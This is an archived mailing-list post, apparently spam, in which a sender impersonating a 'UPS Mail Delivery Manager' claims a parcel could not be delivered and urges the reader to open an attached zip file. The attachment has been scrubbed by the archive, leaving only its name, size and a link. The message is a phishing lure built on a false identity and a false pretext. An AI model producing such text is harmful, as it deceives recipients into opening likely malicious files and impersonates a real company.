[Pkg-audacious-maintainers] We could not deliver your parcel, #007089499

voltagecreative at server.voltagecreative.com voltagecreative at server.voltagecreative.com
Mon Feb 20 11:14:58 UTC 2017

Dear Customer,

We can not deliver your parcel arrived at February 16.

Please check the attachment for details!

Yours truly,
Zachary Schroeder,
UPS Mail Delivery Manager.

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A non-text attachment was scrubbed...
Name: UPS-Parcel-ID-007089499.zip
Type: application/zip
Size: 721 bytes
Desc: not available
URL: <http://lists.alioth.debian.org/pipermail/pkg-audacious-maintainers/attachments/20170220/b9dfdeda/attachment.zip>

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